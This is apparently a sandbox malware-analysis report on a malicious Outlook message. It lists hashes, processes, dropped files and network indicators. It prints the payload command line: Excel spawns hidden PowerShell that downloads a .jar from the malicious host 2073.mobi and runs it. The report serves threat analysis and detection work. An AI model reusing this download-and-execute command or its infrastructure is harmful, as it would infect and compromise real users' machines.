analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

FW 12 22 43 Sel amlar hay irli calismalar p arca d osyasi .msg

Full analysis: https://app.any.run/tasks/734ad156-50f6-4b24-af26-46f7d11d181d
Verdict: Malicious activity
Analysis date: April 23, 2019, 09:21:03
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/vnd.ms-outlook
File info: CDFV2 Microsoft Outlook Message
MD5:

C01E7AEE0273792C49BF62DFE438780D

SHA1:

9216A2DAED28519E83B00B5793E0C1FD25697F48

SHA256:

452C337A9D71E85B8A3727BEF94520443F04211F6ADCA9A45015FDBD1C090824

SSDEEP:

1536:y/bmQCqQS5A0UXOb7JEDTCFmKOTKoKKKhZZ58V3SSy2DhfXXTnnnPjtAAA:y/bTCqdBpGbKOTKoKKKhZZ5G

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 1300)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 1300)
    • Executes PowerShell scripts

      • CMD.EXE (PID: 3816)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • OUTLOOK.EXE (PID: 3864)
    • Creates files in the user directory

      • OUTLOOK.EXE (PID: 3864)
      • powershell.exe (PID: 2220)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 1300)
      • OUTLOOK.EXE (PID: 3864)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.msg | Outlook Message (58.9)
.oft | Outlook Form Template (34.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start outlook.exe excel.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3864"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\FW 12 22 43 Sel amlar hay irli calismalar p arca d osyasi .msg"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Version:
14.0.6025.1000
1300"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEOUTLOOK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
3816CMD.EXE /c powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://2073.mobi\" ,\" %tmp%\\ZINreb.jar\") }" & %tmp%\\ZINreb.jarC:\Windows\system32\CMD.EXEEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2220powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://2073.mobi\" ,\" C:\Users\admin\AppData\Local\Temp\\ZINreb.jar\") }" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 402
Read events
1 897
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
39
Unknown types
1

Dropped files

PID
Process
Filename
Type
3864OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVR2DB4.tmp.cvr
MD5:
SHA256:
3864OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3E295D9C.datimage
MD5:3D5F732E72E96EF1EC2F3877C172397E
SHA256:D63218A5F04FE3924E83EE3B190FE8D1365FB6B04170FEDC7635C30F61F9B006
3864OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BFA25047.datimage
MD5:BD9EF18DB6EF932C03E93A6DA9CD4CE7
SHA256:490ACF9B24FAD678AB25498745243E536C85D76046C9709757DFA0BF3546439F
3864OUTLOOK.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotmpgc
MD5:F538C5CECA44D198F32BEAF9BD83B6C1
SHA256:0381559AACD57F5AF3BA32B3D3732F3A6CA085C8A0937647EB4D5956FC006051
3864OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C7A1E8ED.datimage
MD5:7327A31C0D0A0AD1D8C508BD43CF886E
SHA256:787452BC75841BDDDC9FDDBCA20934665F0FE63E6B7E8CB47950B7E7122D802D
3864OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A3C96A8.datimage
MD5:E9464B730CF4BDA59247CD2E56E68674
SHA256:FA00F7E2C5B6EA2EA94FCEB4AC5612E4C8E8A8BCF5B7678CB005C78386BCB044
3864OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2E832CA2.datimage
MD5:B1A0ABA9E8A52389FED582D9EF821594
SHA256:A163590CC55B4992562A8E445785E2CFDC9E03CA75A11CAE57894C00B9028E11
3864OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3860027F.datimage
MD5:580224CE062B2BC1F9B7B9AD998FAFEC
SHA256:106CB6B2A07BA9D7EC3477F1EFC5F12C50EB6BE9C5003DA876BC4FDB27A2E0FF
3864OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\94FD3AF6.datimage
MD5:69B7FC9EFFA301E4238337F80F7B1943
SHA256:3D46E040A7D64A865A19737100650A468E02CDC78B15124AC1924C90A1A14AD0
3864OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5C45BA74.datimage
MD5:B07BEE671DC501FFDD2A7A92C4C12EEB
SHA256:70AFAFB0193E9425AA23313B43FE1C1C7D54BF4E9D74FD1243D4073203FDC750
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2220
powershell.exe
GET
404
23.254.215.182:80
http://2073.mobi/
US
malicious
3864
OUTLOOK.EXE
GET
64.4.26.155:80
http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig
US
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3864
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
Microsoft Corporation
US
whitelisted
2220
powershell.exe
23.254.215.182:80
2073.mobi
Hostwinds LLC.
US
malicious

DNS requests

Domain
IP
Reputation
config.messenger.msn.com
  • 64.4.26.155
whitelisted
2073.mobi
  • 23.254.215.182
malicious

Threats

No threats detected
No debug info